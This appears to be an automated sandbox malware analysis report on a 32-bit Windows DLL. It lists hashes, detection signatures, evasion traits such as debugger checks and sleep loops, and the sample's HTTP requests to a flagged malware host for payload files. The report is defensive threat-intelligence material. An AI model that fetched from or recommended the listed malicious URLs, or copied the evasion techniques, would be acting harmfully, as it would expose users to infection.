Windows Analysis Report
LLD5HDX0PS.dll

Overview

General Information

Sample name: LLD5HDX0PS.dll
renamed because original name is a hash value
Original sample name: 4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472.dll
Analysis ID: 1500944
MD5: 030a68e321dec0e77b4698fccc5d54db
SHA1: 7b792a49fe27a298343ba26db8cac5ccb150ff89
SHA256: 4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472
Tags: dllrammenale-com
Infos:

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: rundll32 run dll from internet
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://rammenale.com/for2/regit.tmp%S Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpsoft Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogID Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpgQ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4z Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4w Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpmbt Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4m Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpnf Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp44uz Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp?J Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp%f Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpOJ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt6634-1003.mun Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt6634-1003 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4F Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4D Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmph Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpP Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpK Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtC: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpuS Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpS Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtl Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtsoft Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtg Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpG Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtu Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txts Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtr Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtq Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpE Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp0 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp1 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp3w Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtz Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp8 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp3 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4I Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4# Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpent Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtx4C Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtJ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtI Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtfs: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtM3 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmprI3- Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtT Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt44 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp&bt Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtP Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpentfc Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4G Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp0s Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpkbu Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regM Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp(f Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpkJ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtf Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtd Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpWJz Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpsC: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt_ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4X Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4W Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp6634-1003Vbt Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt) Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtent Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4$ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp~ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4P Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt2 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmplS Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4h Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpq Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt9 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpl Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpm Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpBJj Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtF2 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogDevice Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtC Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpz Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtA Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpC: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpu Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: LLD5HDX0PS.dll Virustotal: Detection: 10% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 96.7% probability
Uses 32bit PE files
Source: LLD5HDX0PS.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: LLD5HDX0PS.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 0_2_6BEE1B85
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF38F4 FindFirstFileExW, 0_2_6BEF38F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE61B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 3_2_6FE61B85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE738F4 FindFirstFileExW, 3_2_6FE738F4

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 131.153.206.231 443
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SS-ASHUS SS-ASHUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: rammenale.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.Dc.
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000813B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F7E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000881B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/-H
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/2.168.2.6
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/7
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/_T
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/fo
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt$
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt)
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt2
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4#
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt44
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4G
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4P
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4W
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4X
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt4h
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003.mun
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt9
Source: rundll32.exe, 00000005.00000002.3370723210.0000000003050000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3370922957.0000000003080000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3371348346.0000000003700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt:
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtA
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtC
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3369351939.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369202584.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369345966.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369283677.0000000003300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtC:
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000C9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtF2
Source: rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtI
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtJ
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtM3
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtP
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtT
Source: rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txt_
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtd
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369345966.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtent
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtentties
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtf
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtfs:
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtg
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtl
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtq
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtr
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txts
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtsoft
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtu
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtx4C
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008164000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclog.txtz
